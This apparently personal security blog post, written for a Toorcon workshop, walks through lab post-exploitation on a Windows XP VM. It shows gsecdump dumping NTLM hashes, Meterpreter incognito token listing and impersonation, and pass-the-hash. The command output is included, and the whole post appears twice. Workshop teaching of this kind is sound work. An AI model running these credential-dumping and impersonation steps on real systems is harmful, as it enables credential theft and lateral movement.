So just a follow up post on gsecdump and msvctl after doing prep for post exploitation topics for the toorcon workshop.
For some reason I thought that gsecdump would not require admin privileges, this is incorrect it will require admin or system on the box. What it doesn't require is injecting into lsass to get the hashes (at least according to here).
"Most notable features are extracting password hashes for active logon sessions, LSA secrets without injecting into lsass.exe making it safe to run on any system and pwdump functionality without DLL injection (and a lot more stable). Gsecdump has no DLL dependency making it very easy to use on remote systems with psexec. If it for some reason can't do what it is supposed to, try running it as SYSTEM and you should get your info."
OK, so you still need admin or higher but the cool thing (and I have already covered this) is that it dumps the hashes for active logon sessions. Now, the key to to that is active logon sessions. So if you are userland and admin or higher then you might be stuck with that user's hash because once the log out the active logon session hash seems to disappear (sometimes ??) but if you get a system shell you might get some of the old logged in users.
example:
#popped a system shell and got a command shell with meterpreter
C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
#logged into the box as nobody
C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
XPSP1VM\nobody::e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Logged out as nobody
C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Once nobody logs out, things were back to where they were. This is an important distinction between gsecdump/msvctl and token stealing. But, once you have a hash, any user can use that hash where you have to be admin/system to pass tokens.
Let's see the same scenario with incognito
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
#login as nobody
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
XPSP1VM\nobody
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
#log out as nobody
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
XPSP1VM\nobody
meterpreter > impersonate_token XPSP1VM\\nobody
[-] No delegation token available
[+] Successfully impersonated user XPSP1VM\nobody
meterpreter > getuid
Server username: XPSP1VM\nobody
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Lastly, like I already mentioned in the other msvctl post, you have to actually be sitting on the box to get your new shell with the user's creds you passed because it pops up a whole new command shell. Which is kind of a bummer, with a remote shell. You'll have to use the pass the hash toolkit instead.
Some other reading on gsecdump and msvctl
http://blogs.pointbridge.com/Blogs/seaman_derek/Pages/Post.aspx?_ID=20
http://ciac.llnl.gov/ciac/techbull/CIACTech08-002.shtml
http://truesecurity.se/blogs/murray/archive/2007/06/08/my-sec-310-sesson-on-teched-us-2007-is-now-available-as-a-webcast.aspx
Also I was doing some googling on pass the hash and came across this post in reference to the pass the hash problem, best part in bold.
http://www.eggheadcafe.com/software/aspnet/30890366/hash-injection-mitigation.aspx
best quote:
"Hash injection mitigation? - Steve Riley [MSFT] <06-oct-07 style="font-weight: bold;">In either case, you need to become admin of the computer before you can force the compromised machine to release its hashes from memory, which lessens the likelihood of success. And if you did manage to become admin, there are fare more interesting attacks that you'd want to attempt. By the way, sniffing a network connection won't reveal hashes. In other words, there's nothing new here, and very little that you need to worry about."
I don't know, going from a local admin on a box to domain admin is pretty interesting to me...
For some reason I thought that gsecdump would not require admin privileges, this is incorrect it will require admin or system on the box. What it doesn't require is injecting into lsass to get the hashes (at least according to here).
"Most notable features are extracting password hashes for active logon sessions, LSA secrets without injecting into lsass.exe making it safe to run on any system and pwdump functionality without DLL injection (and a lot more stable). Gsecdump has no DLL dependency making it very easy to use on remote systems with psexec. If it for some reason can't do what it is supposed to, try running it as SYSTEM and you should get your info."
OK, so you still need admin or higher but the cool thing (and I have already covered this) is that it dumps the hashes for active logon sessions. Now, the key to to that is active logon sessions. So if you are userland and admin or higher then you might be stuck with that user's hash because once the log out the active logon session hash seems to disappear (sometimes ??) but if you get a system shell you might get some of the old logged in users.
example:
#popped a system shell and got a command shell with meterpreter
C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
#logged into the box as nobody
C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
XPSP1VM\nobody::e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Logged out as nobody
C:\Documents and Settings\nobody\Desktop>gsecdump -u
gsecdump -u
MSHOME\XPSP1VM$::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Once nobody logs out, things were back to where they were. This is an important distinction between gsecdump/msvctl and token stealing. But, once you have a hash, any user can use that hash where you have to be admin/system to pass tokens.
Let's see the same scenario with incognito
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
#login as nobody
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
XPSP1VM\nobody
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
#log out as nobody
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
XPSP1VM\nobody
meterpreter > impersonate_token XPSP1VM\\nobody
[-] No delegation token available
[+] Successfully impersonated user XPSP1VM\nobody
meterpreter > getuid
Server username: XPSP1VM\nobody
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Lastly, like I already mentioned in the other msvctl post, you have to actually be sitting on the box to get your new shell with the user's creds you passed because it pops up a whole new command shell. Which is kind of a bummer, with a remote shell. You'll have to use the pass the hash toolkit instead.
Some other reading on gsecdump and msvctl
http://blogs.pointbridge.com/Blogs/seaman_derek/Pages/Post.aspx?_ID=20
http://ciac.llnl.gov/ciac/techbull/CIACTech08-002.shtml
http://truesecurity.se/blogs/murray/archive/2007/06/08/my-sec-310-sesson-on-teched-us-2007-is-now-available-as-a-webcast.aspx
Also I was doing some googling on pass the hash and came across this post in reference to the pass the hash problem, best part in bold.
http://www.eggheadcafe.com/software/aspnet/30890366/hash-injection-mitigation.aspx
best quote:
"Hash injection mitigation? - Steve Riley [MSFT] <06-oct-07 style="font-weight: bold;">In either case, you need to become admin of the computer before you can force the compromised machine to release its hashes from memory, which lessens the likelihood of success. And if you did manage to become admin, there are fare more interesting attacks that you'd want to attempt. By the way, sniffing a network connection won't reveal hashes. In other words, there's nothing new here, and very little that you need to worry about."
I don't know, going from a local admin on a box to domain admin is pretty interesting to me...
